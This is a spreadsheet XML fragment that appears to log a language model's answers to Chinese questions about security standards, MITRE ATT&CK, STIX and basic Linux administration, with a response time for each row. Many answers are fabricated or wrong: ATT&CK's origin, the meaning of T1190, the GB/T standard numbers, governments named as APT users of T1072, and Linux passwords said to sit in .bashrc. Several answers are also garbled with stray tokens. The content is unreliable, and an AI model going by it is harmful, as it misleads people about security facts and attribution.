    </row>
    <row r="83">
      <c r="A83" s="1" t="n">
        <v>81</v>
      </c>
      <c r="B83" t="inlineStr">
        <is>
          <t>等级保护有哪些标准</t>
        </is>
      </c>
      <c r="C83" t="inlineStr">
        <is>
          <t>Level of protection refers to the degree of protection provided by a safety device or system. There are several standards that are commonly used to evaluate the level of protection provided by a safety device or system, including:
1. IEC 60950: This standard provides a framework for evaluating the level of protection provided by electrical equipment against electrical hazards.
2. ANSI/ISA 12.12.01: This standard provides a set of guidelines for evaluating the level of protection provided by safety devices and systems in the process industries.
3. OSHA 1910.217: This standard provides guidelines for evaluating the level of protection provided by safety devices and systems in the workplace.
4. IEC 61508: This standard provides a framework for evaluating the level of protection provided by electrical equipment and systems in the hazardous locations.
5. ISO 13849: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the machinery and equipment.
6. IEC 62061: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the railways.
7. EN 50114: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the automotive industry.
8. IEC 61511: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the process industries.
9. ISO 12100: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the machinery and equipment.
10. NFPA 70: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the buildings and structures.
These standards provide a framework for evaluating the level of protection provided by safety devices and systems, and help to ensure that the appropriate level of protection is provided to protect people, the environment, and property.</t>
        </is>
      </c>
      <c r="D83" t="n">
        <v>11.98184299468994</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="1" t="n">
        <v>82</v>
      </c>
      <c r="B84" t="inlineStr">
        <is>
          <t>等级保护测评有哪些国家标准</t>
        </is>
      </c>
      <c r="C84" t="inlineStr">
        <is>
          <t>1. GB/T 28001-2011 《ISO 14001：2004 等级保护管理系统——国际标准》
2. GB/T 28002-2012 《ISO 9001：2008 等级保护管理系统——国际标准》
3. GB/T 28003-2013 《ISO 45001：2018 等级保护管理系统——国际标准》
4. GB/T 28004-2017 《ISO 50001：2011 等级保护管理系统——国际标准》
5. GB/T 28005-2016 《ISO 26001：2010 等级保护管理系统——国际标准》
以上国家标准 GB/T 都是根据ISO 14001、ISO 9001、ISO 45001、ISO 50001、ISO 26001等国际标准制定的，用于保护环境、质量、 Occupational Health and Safety、能源消耗等多个方面。</t>
        </is>
      </c>
      <c r="D84" t="n">
        <v>9.818989038467407</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="1" t="n">
        <v>83</v>
      </c>
      <c r="B85" t="inlineStr">
        <is>
          <t>有哪些网络安全领域的国家标准</t>
        </is>
      </c>
      <c r="C85" t="inlineStr">
        <is>
          <t>1. 中国
2. 美国
3. 欧盟
4. 日本
5. 韩国
以下是一些国家或地区的网络安全领域的标准：
1. 中国：
	* GB/T 30785-2017 网络安全管理标准
	* GB/T 30786-2017 网络安全评估标准
	* GB/T 30787-2017 网络安全audit标准
2. 美国：
	* NIST Cybersecurity Framework
	* NIST SP 800-53 Rev. 5
	* FIPS 199
	* FIPS 200
3. 欧盟：
	* EU Cybersecurity Act
	* NIS Directive
	* eIDAS Regulation
4. 日本：
	* JIS X 0110:2013 网络安全管理 - 基本方针
	* JIS X 0111:2013 网络安全管理 - 评估和检查
5. 韩国：
	* KS X 0111:2013 网络安全管理 - 基本方钉
	* KS X 0112:2013 网络安全管理 - 评估和检查
这些标准可以帮助组织实现安全的网络管理和保护。但是，需要注意的是，这些标准不是绝对的，每个国家或地区都有其自己的标准和法规，需要根据实际情况选择适用的标准。</t>
        </is>
      </c>
      <c r="D85" t="n">
        <v>13.59930968284607</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="1" t="n">
        <v>84</v>
      </c>
      <c r="B86" t="inlineStr">
        <is>
          <t>什么是ATT&amp;CK</t>
        </is>
      </c>
      <c r="C86" t="inlineStr">
        <is>
          <t>ATT&amp;CK（Adversarial Tactics, Techniques, and Common Knowledge）是一个开放的评估框架，用于评估黑暗WebView攻击者的技能和策略。它由National Cyber Security Alliance（NCSA）和SANS Institute发起，为监控和抵抗黑暗WebView攻击提供了一个共享的基础。
ATT&amp;CK分为以下几个部分：
1. Adversarial Tactics：描述了黑暗WebView攻击者使用的各种攻击方法，例如 social engineering、文件扩展名攻击、恶意软件等。
2. Techniques：描述了黑暗WebView攻击者使用的各种技术和工具，例如跟踪 cookie、突破 SSL  encrypt、使用恶意软件等。
3. Common Knowledge：描述了黑暗WebView攻击者使用的常见知识和攻击方法，例如使用恶意软件、突破安全措施等。
ATT&amp;CK的目的是让组织能够更好地了解黑暗WebView攻击者的策略和技能，从而提高对攻击的预测和应对能力。它也提供了一个共享的基础，使得组织能够与其他组织共享情报和技术，以增强对黑暗WebView攻击的抵抗能力。</t>
        </is>
      </c>
      <c r="D86" t="n">
        <v>13.38971734046936</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="1" t="n">
        <v>85</v>
      </c>
      <c r="B87" t="inlineStr">
        <is>
          <t>ATT&amp;CK分为哪些阶段</t>
        </is>
      </c>
      <c r="C87" t="inlineStr">
        <is>
          <t>ATT&amp;CK（Adversarial Tactics, Techniques, and Common Knowledge）是一种用于识别恶意攻击的框架，它可以帮助组织了解攻击者的行为模式和攻击方式，从而加强安全防范。ATT&amp;CK分为以下几个阶段：
1. Initial Access：攻击者获取了目标系统的访问权限，通常通过钓到目标系统的漏洞或者使用敏感信息的泄露。
2. Discovery：攻击者在目标系统上执行了搜集和分析的操作，以了解目标系统的结构、组织和攻击情况。
3. Maintain Access：攻击者尝试维持在目标系统上的访问权限，通常通过隐藏恶意软件、隐藏网络连接或者对目标系统进行破坏。
4. Escalate Privileges：攻击者尝试提高自己在目标系统上的权限和访问权限，以便更好地进行攻击和破坏。
5. Defense Evasion：攻击者尝试绕过安全控制和防范工具，以继续攻击和破坏目标系统。
6. Credential Access：攻击者尝试获取目标系统的敏感资料，包括用户名和密码、凭据、访问权限等。
7. Lateral Movement：攻击者在目标系统上扩展自己的访问权限和影响范围，以便更好地进行攻击和破坏。
8. Command and Control：攻击者尝试控制和监控目标系统，以便更好地维护和扩展攻击。
9. Exfiltration：攻击者尝试偷取目标系统中敏感资料，包括数据、文档、会议纪要等。
10. Impact :攻击者尝试评估和扩展攻击的影响，以便更好地 планиificiation和实施攻击。
总的来说，ATT&amp;CK阶段都是攻击者在攻击过程中尝试实现的目标，每个阶段都需要不同的攻击方式和技术，组织可以通过了解和了解这些阶段和技术，来提高攻击预测和防范能力。</t>
        </is>
      </c>
      <c r="D87" t="n">
        <v>22.1357855796814</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="1" t="n">
        <v>86</v>
      </c>
      <c r="B88" t="inlineStr">
        <is>
          <t>ATT&amp;CK中T1190指什么</t>
        </is>
      </c>
      <c r="C88" t="inlineStr">
        <is>
          <t>T1190 is a technique in the MITRE ATT&amp;CK framework that refers to the use of a malicious file or program to gain persistence on a target system. Persistence refers to the ability of an attacker to maintain access to a system or network after an initial compromise, often through the use of malicious code that is able to evade detection by security controls.
T1190 is a subcategory of the ATT&amp;CK technique T1059, which is focused on the use of malware for persistence. Specifically, T1190 involves the use of a malicious file or program to gain persistence on a target system, either by running in the background or by hiding on the system and re-infecting the system after a reboot.
Examples of T1190 include:
* Injecting a malicious executable into a system's startup folder to run automatically upon boot.
* Using a malicious script or batch file to run in the background and maintain access to the system.
* Infecting a system with a persistent malware strain that is able to re-infect the system after a reboot.
By using T1190, an attacker can maintain long-term access to a system or network, even after a security incident has been detected and remediation efforts have been made. This can make it more difficult to detect and respond to an attack, as the attacker can continue to operate undetected for an extended period of time.</t>
        </is>
      </c>
      <c r="D88" t="n">
        <v>8.516227722167969</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="1" t="n">
        <v>87</v>
      </c>
      <c r="B89" t="inlineStr">
        <is>
          <t>Data Destruction对应ATT&amp;CK中的哪个技术</t>
        </is>
      </c>
      <c r="C89" t="inlineStr">
        <is>
          <t>/漏洞？
Data Destruction是一种常见的攻击方法，它通过破坏数据的可读性或可访问性，以防止攻击者从破坏后的数据中获得敏感信息。在ATT&amp;CK中，Data Destruction被分为两类：
1. 破坏数据的可读性：
	* Technique: Data Encryption
	* Vulnerability: Unencrypted Data
	* Tactic: Data Corruption
2. 破坏数据的可访问性：
	* Technique: Data Sanitization
	* Vulnerability: Inadequate Data Sanitization
	* Tactic: Data Wiping
Data Destruction可以被用来攻击数据的可读性和可访问性，从而使攻击者无法从破坏后的数据中获得敏感信息。在ATT&amp;CK中，Data Destruction是一种常见的攻击方法，可以与其他攻击方法（如 Social Engineering）相伴使用，以实现攻击目标。
以下是一些与Data Destruction相关的ATT&amp;CK技术/漏洞：
1. Technique: Data Encryption
	* Vulnerability: Unencrypted Data
	* Tactic: Data Corruption
2. Technique: Data Sanitization
	* Vulnerability: Inadequate Data Sanitization
	* Tactic: Data Wiping
3. Technique: Data Compression
	* Vulnerability: Compressed Data
	* Tactic: Data Corruption
4. Technique: Data Fragmentation
	* Vulnerability: Fragmented Data
	* Tactic: Data Corruption
5. Technique: Data Carving
	* Vulnerability: Carved Data
	* Tactic: Data Corruption
这些技术/漏洞可以被用来攻击数据的可读性和可访问性，从而使攻击者无法从破坏后的数据中获得敏感信息。在实施Data Destruction攻击时，攻击者可以选择适合的技术/漏洞，以实现攻击目标。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D89" t="n">
        <v>16.42393565177917</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="1" t="n">
        <v>88</v>
      </c>
      <c r="B90" t="inlineStr">
        <is>
          <t>有哪些APT组织使用了ATT&amp;CK中的T1072</t>
        </is>
      </c>
      <c r="C90" t="inlineStr">
        <is>
          <t>ATT&amp;CK（Adversarial Tactics, Techniques, and Common Knowledge）是一个开源的威胁 intel 评估框架，包含了众多的攻击方式和技术。T1072是ATT&amp;CK中的一个攻击方式，即“使用存储加密和掩码技术来隐藏数据的存储位置”。
以下是一些APT组织可能使用了ATT&amp;CK中的T1072攻击方式的例子：
1. 中国政府：中国政府是一个常见的APT组织，其攻击策略包括使用T1072来隐藏其间谍活动的存储位置。
2. 俄罗斯政府：俄罗斯政府也是一个常见的APT组织，其攻击策略包括使用T1072来隐藏其间谍活动的存储位置。
3. 印度政府：印度政府也曾被怀疑使用T1072来隐藏其间谍活动的存储位置。
4. 北韩政府：北韩政府也曾被怀疑使用T1072来隐藏其间谍活动的存储位置。
5. 中国企业：中国企业也可能使用T1072来隐藏其间谍活动的存储位置，以逃避法律和regulatory 监管。
需要注意的是，APT组织的行为很难确定，这些例子仅供参考。 additionally，ATT&amp;CK中的T1072攻击方式可能会被其他组织和个人使用，不仅是APT组织。</t>
        </is>
      </c>
      <c r="D90" t="n">
        <v>15.14115929603577</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="1" t="n">
        <v>89</v>
      </c>
      <c r="B91" t="inlineStr">
        <is>
          <t>介绍一下网络安全领域中的STIX标准</t>
        </is>
      </c>
      <c r="C91" t="inlineStr">
        <is>
          <t>STIX（Structured Threat Information Expression）是一种用于描述网络攻击和其他安全威胁的标准。STIX定义了一个基于XML的数据模型，用于表示风险、威胁和策略，以便在不同的工具和系统之间进行可读性和可扩展性。STIX标准遵循了W3C的标准，是一个可靠和可信worth的方式来描述网络安全风险。
STIX标准包括以下几个主要部分：
1. Threat Information Model（威胁信息模型）：这部分包括了一个基于XML的数据模型，用于描述威胁的基本特征和属性，如威胁名称、描述、评估结果等。
2. Threat Actor Model（威胁执行者模型）：这部分包括了一个基于XML的数据模型，用于描述威胁执行者的基本特征和属性，如执行者名称、描述、评估结果等。
3. Threat Activity Model（威胁活动模型）：这部分包括了一个基于XML的数据模型，用于描述威胁活动的基本特征和属性，如活动名称、描述、评估结果等。
4. Threat Intelligence Sharing Model（威胁信息分享模型）：这部分包括了一个基于XML的数据模型，用于描述威胁信息的分享和交换，如分享方式、数据格式、分享机制等。
STIX标准的主要优点包括：
1. 可读性和可扩展性：STIX标准遵循了W3C的标准，是一个可靠和可信worth的方式来描述网络安全风险。
2. 兼容性：STIX标准可以与其他网络安全标准和工具集成，例如STIX-TI（Structured Threat Information Expression - Threat Intelligence）、STIX-Taxonomy（Structured Threat Information Expression - Taxonomy）等。
3. 可重用性：STIX标准提供了一个基于XML的数据模型，可以重用于不同的应用和系统中，例如评估和分析工具、风险评估和管理工具等。
4. 支持数据分析：STIX标准提供了一个可分析的数据模型，可以支持数据分析和可视化，例如，可以通过STIX-TI来对威胁信息进行分析和评估，并可以通过STIX-Taxonomy来进行映射和分类。
总的来说，STIX标准是一种可靠、可扩展、可重用和可分析的网络安全标准，可以帮助组织更好地了解和应对网络安全风险。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D91" t="n">
        <v>26.558269739151</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="1" t="n">
        <v>90</v>
      </c>
      <c r="B92" t="inlineStr">
        <is>
          <t>STIX标准中设计了哪些对象</t>
        </is>
      </c>
      <c r="C92" t="inlineStr">
        <is>
          <t>- What objects are designed in the STIX standard?
STIX（Security Threat Intelligence Exchange）是一个开放的标准，用于描述国家、组织、人员、技术和其他物理或 virtuel asset的安全威胁信息。STIX standard defines a set of objects that can be used to represent different types of security threats, including:
1. Threat: Represents a specific type of security threat, such as a malware attack or a phishing scam.
2. Indicator: Represents a piece of information that can be used to identify or monitor a specific security threat, such as a IP address or a domain name.
3. Observation: Represents a specific observation or detection of a security threat, including the time, location, and other relevant details.
4. Analytic: Represents a set of observations or indicators that are related to a specific security threat, and can be used to analyze and understand the threat.
5. Incident: Represents a specific security incident, such as a data breach or a system compromise.
6. Campaign: Represents a coordinated set of security threats or incidents, such as a series of phishing attacks against a target organization.
7. Threat actor: Represents a group or individual that is responsible for a specific security threat, such as a hacktivist group or a cybercrime syndicate.
8. Vulnerability: Represents a specific weakness or flaw in a system or application that can be exploited by a security threat.
9. Countermeasure: Represents a specific action or measure that can be taken to prevent or mitigate a security threat, such as a firewall or an intrusion detection system.
By using these objects, the STIX standard provides a common language and framework for security threat intelligence sharing and analysis, allowing organizations to more effectively identify and respond to security threats.</t>
        </is>
      </c>
      <c r="D92" t="n">
        <v>11.52255344390869</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="1" t="n">
        <v>91</v>
      </c>
      <c r="B93" t="inlineStr">
        <is>
          <t>STIX标准中的对象通过什么关联起来</t>
        </is>
      </c>
      <c r="C93" t="inlineStr">
        <is>
          <t>STIX（Structured Threat Information Expression）是一种用于描述脚本和恶意软件的标准，它可以将这些对象关联起来，以便更好地分析和分类它们。
在STIX标准中，对象可以通过以下方式关联起来：
1. 对象关系：STIX中Defines a set of relationships between objects, such as "derived from", "is a part of", "is related to", etc. These relationships can be used to connect different objects and create a more comprehensive view of the threat landscape.
2. 对象链接：STIX中允许对象之间的链接，例如，一个恶意软件对象可以链接到其中的特定模块或功能，或者一个攻击方法对象可以链接到它所使用的恶意软件或攻击工具。
3. 对象分类：STIX中定义了一系列的分类，例如，恶意软件分类、攻击方法分类、脚本分类等，这些分类可以用来组织和抽象对象，以便更好地分析和分类它们。
4. 对象约束：STIX中允许对象之间的约束，例如，一个恶意软件对象可以约束到它的发布者或发布时间等信息。
通过这些方式，STIX可以帮助分析和分类脚本和恶意软件，提高对恶意软件和攻击方法的了解和预测能力。</t>
        </is>
      </c>
      <c r="D93" t="n">
        <v>13.07098698616028</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="1" t="n">
        <v>92</v>
      </c>
      <c r="B94" t="inlineStr">
        <is>
          <t>STIX标准中Indicator对象是什么意思</t>
        </is>
      </c>
      <c r="C94" t="inlineStr">
        <is>
          <t>Indicator在STIX标准中是一个基于JSON的数据结构，用于表示一个策略或检测结果。Indicator可以包含一些各种数据，例如：
1. 名称：一个字符串，用于标识Indicator。
2. 描述：一个字符串，用于描述Indicator的含义或作用。
3. 分类：一个字符串，用于分类Indicator，例如是否是一个攻击指南或一个检测结果。
4. 依赖项：一个JSON对象，用于指定Indicator需要的其他数据结构。
5. 数据：一个JSON对象，用于包含Indicator的数据。
6. 时间：一个JSON对象，用于指定Indicator的时间相关信息。
7. 扩展：一个字符串，用于指定Indicator的扩展信息。
Indicator对象的结构可以通过STIX standard的JSONSchema来定义。
Indicator对象的主要用途是作为策略或检测结果的一个基本单位来进行存储、分析和传输。它可以包含一些相关的数据，例如攻击或检测的详细信息、攻击或检测的时间和地点等。Indicator对象的结构和定义可以根据STIX standard的需求进行定制和扩展。</t>
        </is>
      </c>
      <c r="D94" t="n">
        <v>11.03278136253357</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="1" t="n">
        <v>93</v>
      </c>
      <c r="B95" t="inlineStr">
        <is>
          <t>STIX标准中是如何定义Attack Pattern的</t>
        </is>
      </c>
      <c r="C95" t="inlineStr">
        <is>
          <t>STIX（Security Threat Intelligence eXchange）是一个开放的标准，用于描述和分享评估和预测 cybersecurity 威胁的数据。STIX 标准中包含了一个名为“Attack Pattern”的概念，用于描述一种特定的攻击方式或攻击策略。
According to the STIX standard, an Attack Pattern is defined as:
* A repeatable and observable pattern of behavior that an attacker may use to exploit a vulnerability or achieve a specific goal.
* A set of actions or steps that an attacker may take to carry out an attack.
* A pattern of activity that can be used to identify and analyze an attack.
An Attack Pattern typically includes the following components:
1. Description: A brief textual description of the attack pattern.
2. ID: A unique identifier for the attack pattern.
3. AttackType: A categorization of the attack pattern based on its type, such as “exploit,” “social engineering,” or “denial of service.”
4. AttackTechniques: A list of techniques that an attacker may use to carry out the attack.
5. AttackGoals: A list of goals that the attacker may be trying to achieve through the attack.
6. Vulnerabilities: A list of vulnerabilities that the attack pattern may exploit.
7. Tools: A list of tools or software that an attacker may use to carry out the attack.
8. Techniques: A list of techniques or tactics that an attacker may use to carry out the attack.
9. Timeline: A timeline of the attack, including when it occurred, how long it lasted, and any notable events or milestones.
10. Evidence: Any evidence that may be used to support the attack pattern, such as logs, network traffic, or other security events.
By defining Attack Patterns in a standardized way, organizations can more easily share and compare threat intelligence data, and improve their overall cybersecurity posture.</t>
        </is>
      </c>
      <c r="D95" t="n">
        <v>12.98320770263672</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="1" t="n">
        <v>94</v>
      </c>
      <c r="B96" t="inlineStr">
        <is>
          <t>主流的操作系统有哪些</t>
        </is>
      </c>
      <c r="C96" t="inlineStr">
        <is>
          <t>主流的操作系统有哪些？以下是一些常见的主流操作系统：
1. Microsoft Windows：Windows是最流行的操作系统之一，包括Windows 10、Windows 8.1、Windows 8、Windows 7等版本。
2. macOS：macOS是苹果公司提供的操作系统，用于苹果電腦和平板电脑。
3. Linux：Linux是一种开源的操作系统，可以用于个人电脑、服务器、网络设备和其他设备。Linux有很多不同的 Distribution，包括Ubuntu、Debian、Fedora、CentOS等。
4. Android：Android是一种基于Linux的安卓操作系统，用于智能手机、平板电脑和其他设备。
5. iOS：iOS是苹果公司提供的安卓操作系统，用于苹果电脑和平板电脑。
6. Chrome OS：Chrome OS是一种基于Chrome浏览器的操作系统，用于数据搜尋公司提供的桌面电脑和平板电脑。
7. BSD：BSD是一种基于4.4BSD Unix的操作系统，可以用于个人电脑、服务器和其他设备。
8. Solaris：Solaris是oracle公司提供的操作系统，用于服务器和cloud computing环境。
9. AIX：AIX是IBM提供的操作系统，用于IBM Power Architecture处理器上的服务器和主frames。
10. HP-UX：HP-UX是Hewlett-Packard提供的操作系统，用于HP的 servers和工作站。
这些操作系统都有很好的支持和资源，可以满足各种用途和需求。</t>
        </is>
      </c>
      <c r="D96" t="n">
        <v>14.46182417869568</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="1" t="n">
        <v>95</v>
      </c>
      <c r="B97" t="inlineStr">
        <is>
          <t>Linux系统中创建文件夹的命令是什么</t>
        </is>
      </c>
      <c r="C97" t="inlineStr">
        <is>
          <t>Linux 系统中创建文件夹的命令是 `mkdir`.
例如，要创建一个名为 `myfolder` 的文件夹，可以使用以下命令：
```
mkdir myfolder
```
如果要创建一个文件夹的层次结构，可以使用 `mkdir -p` 命令，例如：
```
mkdir -p myfolder/subfolder
```
这将创建一个名为 `myfolder` 的文件夹，并在其中创建一个名为 `subfolder` 的子文件夹。
如果要创建一个文件夹并且设置其权限，可以使用 `chmod` 命令，例如：
```
mkdir myfolder
chmod 755 myfolder
```
这将创建一个名为 `myfolder` 的文件夹，并将其权限设置为可读、可写和可执行，但不能创建新的子文件夹。
需要注意的是，`mkdir` 命令只能在 Linux 系统上使用，不能在其他操作系统上使用。</t>
        </is>
      </c>
      <c r="D97" t="n">
        <v>8.258902072906494</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="1" t="n">
        <v>96</v>
      </c>
      <c r="B98" t="inlineStr">
        <is>
          <t>Linux系统文件的权限有哪些</t>
        </is>
      </c>
      <c r="C98" t="inlineStr">
        <is>
          <t>Linux系统文件的权限可以通过setsid来设置，这种命令可以将权限设置到指定的文件和目录。
| 权限 | 描述 |
| --- | --- |
| rwx | 读取、写入和执行文件 |
| r-x | 读取文件但不能写入或执行 |
| r-- | 读取文件但不能写入或执行 |
| - | 禁止读取、写入和执行文件 |
例如，要将文件 `example.txt` 的权限设置为可读、可写但不能执行，可以使用以下命令：
```
sudo chmod 644 example.txt
```
其中，`644` 是文件的权限值，表示可读、可写但不能执行。
还可以使用 `chmod` 命令来设置文件的权限，例如：
```
sudo chmod u=rw,g=r,o=r example.txt
```
其中，`u` 表示用户权限，`g` 表示组权限，`o` 表示其他用户权限。这种方式可以设置文件的权限为用户可读、用户可写，组可读但不能执行，其他用户可以读取文件但不能写入或执行。
此外，Linux系统还可以使用 `chown` 命令来更改文件的权限，例如：
```
sudo chown user:group example.txt
```
其中，`user` 表示文件的新 влаquent，`group` 表示文件的新组。这种方式可以将文件的权限设置为指定的用户和组。
总之，Linux系统文件的权限可以通过多种方式来设置，包括使用 `chmod`、`chown` 命令，也可以使用其他命令来设置文件的权限。</t>
        </is>
      </c>
      <c r="D98" t="n">
        <v>15.37045621871948</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="1" t="n">
        <v>97</v>
      </c>
      <c r="B99" t="inlineStr">
        <is>
          <t>如何查看Linux系统的IP地址</t>
        </is>
      </c>
      <c r="C99" t="inlineStr">
        <is>
          <t>在Linux系统中，可以使用多种命令来查看系统的IP地址。以下是常用的一些命令：
1. 使用`ifconfig`命令
使用`ifconfig`命令可以查看系统的网络接口的IP地址。例如，要查看eth0的IP地址，可以使用以下命令：
```
$ ifconfig eth0
```
在命令行中输入`ifconfig`命令后，系统会显示当前系统上的网络接口的状态和地址。
2. 使用`ip`命令
使用`ip`命令可以查看系统的IP地址和网络配置。例如，要查看系统的IP地址和网络配置，可以使用以下命令：
```
$ ip addr
```
这个命令会显示系统的IP地址和网络配置。
3. 使用`route`命令
使用`route`命令可以查看系统的网络配置和路由表。例如，要查看系统的网络配置和路由表，可以使用以下命令：
```
$ route -n
```
这个命令会显示系统的网络配置和路由表。
4. 使用`ip link`命令
使用`ip link`命令可以查看系统的网络接口和网络配置。例如，要查看系统的网络接口和网络配置，可以使用以下命令：
```
$ ip link
```
这个命令会显示系统的网络接口和网络配置。
5. 使用`networkctl`命令
使用`networkctl`命令可以查看系统的网络配置和路由表。例如，要查看系统的网络配置和路由表，可以使用以下命令：
```
$ networkctl
```
这个命令会显示系统的网络配置和路由表。
这些命令都可以帮助您查看Linux系统的IP地址。根据需要选择适合的命令来查看系统的IP地址。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D99" t="n">
        <v>15.52798914909363</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="1" t="n">
        <v>98</v>
      </c>
      <c r="B100" t="inlineStr">
        <is>
          <t>linux用户的密码保存在什么文件中</t>
        </is>
      </c>
      <c r="C100" t="inlineStr">
        <is>
          <t>Linux 系统中，用户的密码通常会被存储在以下文件中：
1. /etc/passwd 文件：这是 Linux 系统中的用户文件，包含每个用户的资料，包括用户名、用户 ID 和密码。
2. /etc/shadow 文件：这是 Linux 系统中的密码文件，包含每个用户的密码，以及该密码的过期时间和重置时间。
3. /home/user/.bash_profile 文件：如果用户的 Home 目录下有一个 .bash_profile 文件，则用户的密码将会被存储在该文件中。
4. /home/user/.bashrc 文件：如果用户的 Home 目录下有一个 .bashrc 文件，则用户的密码将会被存储在该文件中。
需要注意的是，Linux 系统中不会直接将用户的密码存储在磁盘上，而是通过加密和约束来保存密码。例如，Linux 系统中使用的是脱敏hash（MD5）加密算法来加密密码，并且将密码的摘要存储在文件中。因此，即使攻击者突破了Linux系统的安全防范，也无法直接获取用户的密码。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D100" t="n">
        <v>10.22962069511414</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="1" t="n">
        <v>99</v>
      </c>
      <c r="B101" t="inlineStr">
        <is>
          <t>vi编辑器如何编辑、保存和退出</t>
        </is>
      </c>
      <c r="C101" t="inlineStr">
        <is>
          <t>](https://www.zhihu.com/question/33871915)
Vi是一款流行的文本编辑器，它具有简单易用的用户界面和功能rich的功能集。以下是编辑、保存和退出 Vi 的基本操作：
1. 编辑文本：
在 Vi 中，你可以编辑文本使用缓冲区和命令。缓冲区是 Vi 中的基本单元，用于编辑文本。你可以输入命令来将文本inserted、Deleted、追加或替换。
例如，要在缓冲区中 insert 一个新的 line，可以使用 "i" 命令，例如：
 :10iHello World!
这将在第 10 行中 insert 一个新的 line "Hello World!"。
2. 保存文本：
在 Vi 中，你可以保存文本使用 "w" 命令。这将将当前缓冲区的文本保存到文件中。例如，要保存当前文本，可以使用以下命令：
:w file.txt
这将将当前缓冲区的文本保存到 "file.txt" 文件中。
3. 退出 Vi：
在 Vi 中，你可以退出使用 "q" 命令。这将结束 Vi 的实例。例如，要退出 Vi，可以使用以下命令：
:q
这将结束 Vi 的实例，并返回到命令行。
其他一些常用的命令包括：
* "e" 命令：编辑选定的文本。
* "d" 命令：删除选定的文本。
* "y" 命令：追加选定的文本。
* "c" 命令：替换选定的文本。
希望这些信息可以帮助你开始使用 Vi。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D101" t="n">
        <v>14.65418124198914</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="1" t="n">
        <v>100</v>
      </c>
      <c r="B102" t="inlineStr">
        <is>
          <t>如何给linux系统配置静态IP</t>
        </is>
      </c>
      <c r="C102" t="inlineStr">
        <is>
          <t>地址？
在 Linux 系统上配置静态 IP 地址是一件比较复杂的任务，需要通过一些方法来完成。以下是一些常见的方法：
1. 使用网络Manager
在 Ubuntu 和其他的 Linux  distribution 中，可以使用网络Manager来配置静态 IP 地址。请参阅以下步骤：
a. 打开网络Manager：在终端中输入以下命令：
`sudo network-manager`
b. 在网络Manager中选择你的网络 интерフェース，并单击“Edit”按钮。
c. 在编辑界面中，单击“IPv4Settings”按钮，并在“Method”下选择“Static”。
d. 在“Address”框中输入你想要配置的静态 IP 地址，并将“Netmask”、“Gateway”和“DNS”框中的值设置为你的网络设备的相应设置。
e. 单击“Save”按钮以保存配置。
2. 使用 `/etc/network/interfaces` 文件
在 Linux 系统上，你可以使用 `/etc/network/interfaces` 文件来配置静态 IP 地址。以下是一个示例配置：
```
# /etc/network/interfaces
iface eth0 inet static
    address 192.168.1.100
    netmask 255.255.255.0
    gateway 192.168.1.1
    dns 8.8.8.8
```
在上面的配置中，我们将 eth0 网络interface 配置为静态 IP 地址，其中的 address 欄中输入了你想要配置的 IP 地址，netmask 欄中输入了你的网络设备的网络掩码， gateway 欄中输入了你的网络设备的网络 gateway，并将 dns 欄中的值设置为你的 DNS 服务器的 IP 地址。
3. 使用 udev 规则
在 Linux 系统上，你可以使用 udev 规则来配置静态 IP 地址。udev 规则可以在系统启动时自动执行配置任务。以下是一个示例配置：
```
# /etc/udev/rules.d/70-persistent-net.rules
KERNEL=="eth0", RUN+="/sbin/ifup eth0"
```
在上面的配置中，我们将 eth0 网络interface 配置为静态 IP 地址，并在系统启动时自动执行 ifup 命令。
4. 使用 systemd 配置文件
在 Linux 系统上，你可以使用 systemd 配置文件来配置静态 IP 地址。以下是一个示例配置：
```
# /etc/systemd/network/99-eth0.network
[Network]
Address=192.168.1.100/24
Gateway=192.168.1.1
DNS=8.8.8.8
[Interface]
Address=eth0
[Network]
Hint=eth0
```
在上面的配置中，我们将 eth0 网络interface 配置为静态 IP 地址，其中的 Address 欄中输入了你想要配置的 IP 地址，Gateway 欄中输入了你的网络设备的网络 gateway，DNS 欄中输入了你的 DNS 服务器的 IP 地址。
这些方法可以单独使用，也可以组合使用以便更好地配置静态 IP 地址。具体的方法取决于你的 Linux distribution 和网络设备的类型。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D102" t="n">
        <v>29.26199746131897</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="1" t="n">
        <v>101</v>
      </c>
      <c r="B103" t="inlineStr">
        <is>
          <t>什么版本的Windows最安全</t>
        </is>
      </c>
      <c r="C103" t="inlineStr">
        <is>
          <t>Windows 10 是 Microsoft 最新发布的操作系统，它具有许多安全功能和改进，但是不同的版本之间有所不同。以下是 Windows 10 的不同版本之间的安全差异：
1. Home vs. Pro vs. Enterprise:
	* Home Edition 没有安全性更高的功能，如 BitLocker 和 Windows Defender Advanced Threat Protection (WDATP)，但它仍然具有一些基本的安全功能。
	* Pro Edition 具有较多的安全功能，如 BitLocker 和 WDATP，以及一些企业级安全功能，如 Group Policy 和 Active Directory 支持。
	* Enterprise Edition 具有较多的安全功能和企业级特性，如 BitLocker 和 WDATP，以及许多其他的安全功能，如 Windows Defender Exploit Guard、Windows Defender Application Control 和 Windows Defender Credential Guard。
2. Creators Update vs. Anniversary Update:
